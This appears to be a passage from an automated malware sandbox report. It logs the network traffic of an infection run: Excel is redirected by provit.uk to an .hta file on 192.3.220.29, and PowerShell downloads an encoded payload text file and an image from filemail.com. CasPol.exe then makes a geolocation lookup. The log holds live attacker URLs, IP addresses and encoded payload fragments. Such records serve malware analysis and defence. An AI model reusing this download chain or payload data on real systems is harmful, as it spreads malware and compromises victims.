                                                                                                            Data Ascii: kDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QxNodDZ3A2NcdDW3Q1NQdDT3g0NEdDQ3wzN4cDN3AzNscDK3QyNgcDH3gxNUcDE3wwNIcDB3AgN8bD+2QvNwbD72guNkbD42wtNYDAACAFAFAIAAAwOcsDF7wwOEoD/6QvOsrD56wtOUrDz6QsO8qDt
                                                                                                            Nov 20, 2024 16:58:11.865830898 CET1236INData Raw: 4d 35 4e 49 65 44 5a 33 51 7a 4e 6e 63 54 44 32 49 71 4e 69 56 44 6f 31 6f 35 4d 76 4e 6a 4a 7a 49 67 4d 76 4c 7a 34 79 63 74 4d 4c 4c 6a 68 79 34 6d 4d 44 4a 44 4a 79 45 68 4d 46 45 54 2b 78 51 64 4d 70 47 7a 5a 78 34 56 4d 59 46 54 54 78 49 55
                                                                                                            Data Ascii: M5NIeDZ3QzNncTD2IqNiVDo1o5MvNjJzIgMvLz4yctMLLjhy4mMDJDJyEhMFET+xQdMpGzZx4VMYFTTxIUMEADhAAAAgCQBQBwPo+zY8oJP0xjW8gCPAsD07g7OVtTO64tOTrTt6sqOYqTj4s3Nsbzb0QyMxPjOzcyMIIT+yAtM8KDVy0kMGJzPAAAAIBQBABgP7vj978+O4uDs6s7NReji3M1NLBAAAwBAFADA/g3PM0Tg9UAP
                                                                                                            Nov 20, 2024 16:58:11.865847111 CET1236INData Raw: 42 6a 57 77 49 46 4d 6f 41 41 41 41 67 4b 41 45 41 4d 41 2f 45 39 50 46 2f 54 75 2f 55 36 50 5a 2b 7a 4e 2f 38 79 50 52 38 54 43 2f 45 67 50 35 37 54 72 39 45 48 50 69 7a 7a 77 38 51 4b 50 35 74 7a 44 36 30 68 4f 58 6b 54 65 35 38 55 4f 46 68 54
                                                                                                            Data Ascii: BjWwIFMoAAAAgKAEAMA/E9PF/Tu/U6PZ+zN/8yPR8TC/EgP57Tr9EHPizzw8QKP5tzD60hOXkTe58UOFhTh4sFO7gDC346NmdjS3wwNCYD42wsNvaDg2kmN6YTJ1UdNxSDq0Q4MaPDkzM3MANDKy8pMHKzeyUkMyED9xUeMmGTQwcOMcDzzwwKMOCAAAQIAEALA/E9PI+zN/oxPG4Td98fPz1za7o7OyujE6AvOVrzy64oO0ojH
                                                                                                            Nov 20, 2024 16:58:11.865852118 CET1236INData Raw: 30 74 4f 58 6a 7a 32 33 4d 37 4d 78 50 54 6a 78 49 47 4d 62 41 7a 46 77 4d 42 4d 50 41 7a 43 77 63 41 4d 44 41 41 41 41 77 46 41 45 41 47 41 2f 38 76 50 4a 31 44 37 39 30 62 50 53 78 7a 48 37 30 75 4f 6a 70 44 57 35 59 58 4f 4d 6c 6a 49 34 55 50
                                                                                                            Data Ascii: 0tOXjz23M7MxPTjxIGMbAzFwMBMPAzCwcAMDAAAAwFAEAGA/8vPJ1D790bPSxzH70uOjpDW5YXOMljI4UPOjjzb3M7NbdTM3sgNlbDozk8MeNzSzghMoLzvyUrMrCjRAAAAEBABQBAAA8jR+8nPl5jU+gjPl4zC8I+OdvTJ74xODoT/6YvOorT36YtOpqDk54OOndz+3I/NGfDR2MvNrbDm2AGNFIzNycSMiHzoxACMhBzRAAAA
                                                                                                            Nov 20, 2024 16:58:11.865864992 CET1236INData Raw: 41 41 41 41 51 46 41 44 41 4c 41 2b 41 73 50 57 30 54 78 39 77 62 50 6f 32 44 54 39 45 55 50 7a 30 54 4a 39 67 52 50 43 77 54 37 38 6f 4d 50 7a 79 6a 6e 38 34 49 50 41 79 44 64 38 67 47 50 61 78 7a 53 38 45 7a 4f 56 6b 7a 6d 35 73 42 4f 42 69 6a
                                                                                                            Data Ascii: AAAAQFADALA+AsPW0Tx9wbPo2DT9EUPz0TJ9gRPCwT78oMPzyjn84IPAyDd8gGPaxzS8EzOVkzm5sBOBije4sAOAcz43M7Nhejb3E2NXZTaAAAAQBwAgCAAAQTW08ENFMz+zg8M7OTDzUgM8LzvyMrMWKjHyIRM1GDrxgWM1EjLwEBMFAAAAQDADAJAAAwPf/z0/E8Pe+zk/44PG+jd/U1PQ9zS/8zP18zF/IxPN8TA+cvPc7z1
                                                                                                            Nov 20, 2024 16:58:11.985171080 CET1236INData Raw: 51 53 50 63 30 6a 44 38 6b 75 4f 79 70 7a 61 36 38 6c 4f 48 6c 54 30 35 55 63 4f 67 6b 6a 47 34 51 50 4f 43 6a 7a 74 34 77 4a 4f 45 69 7a 5a 34 67 46 4f 53 68 6a 53 33 67 2f 4e 51 66 54 6d 33 38 33 4e 4a 64 6a 4c 33 73 78 4e 57 63 54 44 33 41 67
                                                                                                            Data Ascii: QSPc0jD8kuOypza68lOHlT05UcOgkjG4QPOCjzt4wJOEizZ4gFOShjS3g/NQfTm383NJdjL3sxNWcTD3AgNrbzz2krNxajq2kZN8XT31gcN7Wzq1YZN3VzX1MUN1UjD0sPNKTzr08JNXSjf0QFNERDP0QCNEMz5zg8MtOjkzM3MYNzUzA0M2MDLzYyMhMjFz4wMGIj/ycvMwLT6yIuMbLD1y0sMHLTwysrM1Kzry4nM1JTZyUlM


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.2249177178.237.33.5080800C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 16:58:17.770757914 CET71OUTGET /json.gp HTTP/1.1
                                                                                                            Host: geoplugin.net
                                                                                                            Cache-Control: no-cache
                                                                                                            Nov 20, 2024 16:58:19.031322002 CET1170INHTTP/1.1 200 OK
                                                                                                            date: Wed, 20 Nov 2024 15:58:18 GMT
                                                                                                            server: Apache
                                                                                                            content-length: 962
                                                                                                            content-type: application/json; charset=utf-8
                                                                                                            cache-control: public, max-age=300
                                                                                                            access-control-allow-origin: *
                                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                            Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.2249178192.3.220.29802144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 16:58:28.084156036 CET75OUTGET /45/HDRDDG.txt HTTP/1.1
                                                                                                            Host: 192.3.220.29
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 16:58:29.247379065 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 15:58:28 GMT
                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                            Last-Modified: Wed, 20 Nov 2024 06:25:06 GMT
                                                                                                            ETag: "a0800-6275235f113e8"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 657408
                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: text/plain
                                                                                                            Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 [TRUNCATED]
                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nDozQzMwIDpyAqMEKDgywnMwJDWygkM4IDKygRMoHD2xQdMQHDzxgcMEHDwxwbM4GDrxgaMkGDoxwZMYGDlxAZMMGDixgWMkFDYAAAAQCwBAAAAAADHwgAMAAAAAABAGAOAAAwPs/D5/w9PU/D0/g8P0+Dr/g5PQ+Di/A4P89De/Q3Pw9Da/Q2Pc9DS/A0Ps8DJ/wxPU4D8+guPg7D3+AsPg6Dn+AoPg5DQ+AiPA0D49AcPg2Dg9AWPA1DI9AAPgzDw8AKPAyDY8AEPgwDA7A+OAvDo7A4OgtDQ7AyOEsDA6gvOYrDu6gpO4pDW6gjOYkD+5gdO4mDt5gZO4lDX5AVOwkDE4APOQjDs4AJOwhDU4wDO0gDM4gCOggDG4QxN4fD93w8NEfDu3Q5NEeDg3g3NcdDW3A1NwcDL2gvNsbDz2AsN4aDp2wpNYaDl2woNEaDf2gmNgZDX2glNQZDS2AkNsYDJ2AhNIYDB2AQN4XD81geNUXDz1gcNAXDu1AbNsWDk1wYNMVDP1gQNAQD90QONwSDq0wJNMSDW0AFNERDN0AwM4PD7zw9MoODozQ5MEODUzg0M8MDLygvMwLD5yQtMgKDmywoMEKDfygkMAJDNywiMkED8xgeMcHD1xwcMYGDkxQYM0FDQxgTMsEDHwgOMgDAAB
                                                                                                            Nov 20, 2024 16:58:29.247396946 CET224INData Raw: 67 4a 41 47 41 4e 41 41 41 41 50 77 79 44 6d 38 41 4a 50 4d 79 44 69 38 67 48 50 30 78 44 5a 38 77 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 67 77 44 48 38 77 77 4f 30 76 44 37 37 67 2b 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38
                                                                                                            Data Ascii: gJAGANAAAAPwyDm8AJPMyDi8gHP0xDZ8wEPExDQ8wDP4wDN8ADPgwDH8wwO0vD77g+OkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDd7A3OgtDS7A0O8sDO7QzOwsDI7wxOMoD96wuOorD56QtOQrDw6wrOsqDl6woOIqDe6AmOYpDV6AlOMpDP6QiOgoDC6AQO8nD+5QfOwnD45wdOMnDt5waOomDm5
                                                                                                            Nov 20, 2024 16:58:29.247410059 CET1236INData Raw: 51 5a 4f 45 6d 44 62 35 51 57 4f 67 6c 44 58 35 77 55 4f 49 6c 44 4f 35 41 53 4f 59 6b 44 46 35 41 52 4f 4d 6b 44 43 34 67 50 4f 30 6a 44 35 34 77 4d 4f 45 6a 44 77 34 77 4c 4f 34 69 44 71 34 51 4b 4f 55 69 44 66 34 51 48 4f 77 68 44 59 34 67 45
                                                                                                            Data Ascii: QZOEmDb5QWOglDX5wUOIlDO5ASOYkDF5AROMkDC4gPO0jD54wMOEjDw4wLO4iDq4QKOUiDf4QHOwhDY4gEOAhDP4gDOogDJ4QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZN
                                                                                                            Nov 20, 2024 16:58:29.247423887 CET1236INData Raw: 31 44 5a 39 77 56 50 55 31 44 54 39 51 55 50 38 30 44 4e 39 77 53 50 6b 30 44 48 39 51 52 50 4d 30 44 42 38 77 50 50 30 7a 44 37 38 51 4f 50 63 7a 44 31 38 77 4d 50 45 7a 44 76 38 51 4c 50 73 79 44 70 38 77 4a 50 55 79 44 6a 38 51 49 50 38 78 44
                                                                                                            Data Ascii: 1DZ9wVPU1DT9QUP80DN9wSPk0DH9QRPM0DB8wPP0zD78QOPczD18wMPEzDv8QLPsyDp8wJPUyDj8QIP8xDd8wGPkxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl
                                                                                                            Nov 20, 2024 16:58:29.247437000 CET1236INData Raw: 77 52 50 59 30 44 45 39 67 41 41 41 41 41 58 41 55 41 73 41 73 44 69 37 51 34 4f 41 75 44 66 37 67 33 4f 30 74 44 63 37 77 32 4f 6f 74 44 5a 37 41 32 4f 63 74 44 57 37 51 31 4f 51 74 44 54 37 67 30 4f 45 74 44 51 37 77 7a 4f 34 73 44 4e 37 41 7a
                                                                                                            Data Ascii: wRPY0DE9gAAAAAXAUAsAsDi7Q4OAuDf7g3O0tDc7w2OotDZ7A2OctDW7Q1OQtDT7g0OEtDQ7wzO4sDN7AzOssDK7QyOgsDH7gxOUsDE7wwOIsDB7AgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6AkO
                                                                                                            Nov 20, 2024 16:58:29.247448921 CET1236INData Raw: 76 44 78 37 77 37 4f 30 75 44 72 37 51 36 4f 63 75 44 6c 37 77 34 4f 45 75 44 66 37 51 33 4f 73 74 44 5a 37 77 31 4f 55 74 44 54 37 51 30 4f 38 73 44 4e 37 77 79 4f 6b 73 44 48 37 51 78 4f 4d 73 44 42 36 77 76 4f 30 72 44 37 36 51 75 4f 63 72 44
                                                                                                            Data Ascii: vDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD9
                                                                                                            Nov 20, 2024 16:58:29.247461081 CET1236INData Raw: 49 34 4f 34 74 6a 62 37 55 32 4f 2b 73 6a 4e 37 38 68 4f 37 72 7a 76 36 45 6f 4f 45 70 44 43 35 6b 66 4f 71 6e 7a 74 35 38 4b 4f 72 6a 7a 34 34 73 4e 4f 54 69 6a 62 34 77 45 4f 6e 67 44 47 34 6b 77 4e 30 55 6a 35 31 34 54 4e 69 51 6a 62 30 45 46
                                                                                                            Data Ascii: I4O4tjb7U2O+sjN78hO7rzv6EoOEpDC5kfOqnzt58KOrjz44sNOTijb4wEOngDG4kwN0Uj514TNiQjb0EFM1CzrwsJM9BzawYGAAAA8AUAYA8DE+wtPr6TR9oVPL1zP98SPS0jC8AOPZyTe80GPhxTT8E0Ofvz17k7OxuTq7E6OZujS74SOhmzl50WOghj/40OOnjj44wNO+iTt4wKOXizE3o/NyeDo3M5NIeDZ3QzNncTD2IqN
                                                                                                            Nov 20, 2024 16:58:29.247474909 CET1236INData Raw: 47 44 6d 78 73 47 4d 31 41 41 41 41 77 48 41 45 41 4e 41 2f 49 2f 50 52 2f 54 79 2f 45 37 50 64 36 44 30 2b 45 71 50 78 30 6a 35 39 34 64 50 69 31 7a 57 39 73 42 50 38 79 7a 6a 38 77 45 50 42 78 44 4f 38 51 78 4f 75 76 6a 35 37 63 34 4f 2f 74 7a
                                                                                                            Data Ascii: GDmxsGM1AAAAwHAEANA/I/PR/Ty/E7Pd6D0+EqPx0j594dPi1zW9sBP8yzj8wEPBxDO8QxOuvj57c4O/tzT74jORqDJ6QQOVnTz5UbOpmjY54UOUgDs4UGOchzU40DOxgzE4sAOAcz93E+NLfDk3U4N8dzS3MkN2aTp2UpNNaDf2wWNrVjF1YANpTTdzA8MZJT0yQoM5JTZygkMREzzx4JMiCzkwcIM3BjWwIFMoAAAAgKAEAMA
                                                                                                            Nov 20, 2024 16:58:29.247488976 CET1236INData Raw: 49 43 4e 58 4d 7a 2b 7a 45 2f 4d 57 50 54 30 7a 77 38 4d 42 50 6a 6a 7a 6f 32 4d 6c 4e 44 59 7a 55 31 4d 34 4d 44 46 79 41 75 4d 2f 4b 7a 70 79 49 71 4d 64 4b 6a 6b 79 41 6f 4d 65 4a 44 55 79 51 6b 4d 31 49 44 48 78 55 66 4d 74 48 6a 31 78 59 63
                                                                                                            Data Ascii: ICNXMz+zE/MWPT0zw8MBPjjzo2MlNDYzU1M4MDFyAuM/KzpyIqMdKjkyAoMeJDUyQkM1IDHxUfMtHj1xYcMKGjgxUWMgFzWxYQMBAz7wgOMiDz2wELMXCzgwsHMvBjUwgEMlAzGwYAAAEAmAQAcA8T9/M9PJ/Dv/M7PZ+Di/M1PK9TO/0yPS8TA+wsPF7Dm+EZPY3DX9gEPMxTA7E9OguDU7MzOtoz760tOXjz23M7MxPTjxIGM
                                                                                                            Nov 20, 2024 16:58:29.247504950 CET1236INData Raw: 76 7a 4a 37 73 67 4f 79 71 44 6d 30 6b 31 4d 32 50 44 70 7a 41 36 4d 63 4f 44 6d 7a 51 35 4d 51 4f 44 6a 7a 67 34 4d 45 4f 44 67 7a 77 33 4d 34 4e 44 58 77 45 4b 41 41 41 41 50 41 4d 41 30 41 34 44 52 78 77 58 4d 34 46 44 64 78 41 58 4d 73 46 44
                                                                                                            Data Ascii: vzJ7sgOyqDm0k1M2PDpzA6McODmzQ5MQODjzg4MEODgzw3M4NDXwEKAAAAPAMA0A4DRxwXM4FDdxAXMsFDaxQWMgBD1wwFMYBDVwAFMMBDSwQEMABAAAwCADAMA/Q7P88DO/QzPw8DL/gyPk8DI+cpPg4DH+ghPU4DE+wgPI4DB98GP4zD98APPszD68QOPgzD38MlO/qTr6soO2pjV6QUOngjaxgLM8AAAAQFADALA+AsPW0Tx
                                                                                                            Nov 20, 2024 16:58:29.369322062 CET1236INData Raw: 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f 36 54 75 2b 4d 72 50 75 36 44 71 2b 49 71 50 63 36 7a 6c 2b 45 70 50 4b 36 54 68 2b 41 6f 50 36 35 44 64 2b 34 6d 50 70 35 7a 59 2b 30 6c
                                                                                                            Data Ascii: owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/6Tu+MrPu6Dq+IqPc6zl+EpPK6Th+AoP65Dd+4mPp5zY+0lPX5jU+wkPG5DQ+sjP14zL+kiPk4jH+ghPS4TD+cgPB0z+9YfPw3j69QePf3T29MdPN3Dy9IcP82jt9EbPr2Tp98ZPa2Dl94YPI2zg90XP31Tc9wWPm1DY9oVPV1zT9kUPD1jP9gTPx0jK9QSPc0jD8kuOypza68lO


                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.2249163198.244.140.414433552C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 15:57:18 UTC388OUTGET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Host: provit.uk
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 15:57:19 UTC443INHTTP/1.1 302 Found
                                                                                                            Content-Length: 96
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Date: Wed, 20 Nov 2024 15:57:18 GMT
                                                                                                            Location: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta
                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                            Vary: Accept
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-Dns-Prefetch-Control: off
                                                                                                            X-Download-Options: noopen
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Xss-Protection: 0
                                                                                                            Connection: close
                                                                                                            2024-11-20 15:57:19 UTC96INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 39 2f 34 35 2f 77 77 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 67 6e 73 77 68 69 63 68 67 69 76 69 6e 67 62 65 73 74 6f 70 70 6f 72 74 75 6e 69 74 69 65 73 2e 68 74 61
                                                                                                            Data Ascii: Found. Redirecting to http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.2249165198.244.140.414433844C:\Windows\System32\mshta.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 15:57:24 UTC412OUTGET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Host: provit.uk
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 15:57:24 UTC443INHTTP/1.1 302 Found
                                                                                                            Content-Length: 96
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Date: Wed, 20 Nov 2024 15:57:24 GMT
                                                                                                            Location: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta
                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                            Vary: Accept
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-Dns-Prefetch-Control: off
                                                                                                            X-Download-Options: noopen
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Xss-Protection: 0
                                                                                                            Connection: close
                                                                                                            2024-11-20 15:57:24 UTC96INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 39 2f 34 35 2f 77 77 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 67 6e 73 77 68 69 63 68 67 69 76 69 6e 67 62 65 73 74 6f 70 70 6f 72 74 75 6e 69 74 69 65 73 2e 68 74 61
                                                                                                            Data Ascii: Found. Redirecting to http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.2249168142.215.209.784431712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 15:57:48 UTC192OUTGET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                                                            Host: 1017.filemail.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 15:57:48 UTC324INHTTP/1.1 200 OK
                                                                                                            Content-Length: 2230233
                                                                                                            Content-Type: image/jpeg
                                                                                                            Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            ETag: 4bb5a8185f3b16880e3dcc573015c5d9
                                                                                                            X-Transfer-ID: wxhdiueivoluihj
                                                                                                            Content-Disposition: attachment; filename=new_imagem.jpg
                                                                                                            Date: Wed, 20 Nov 2024 15:57:48 GMT
                                                                                                            Connection: close
                                                                                                            2024-11-20 15:57:48 UTC3719INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
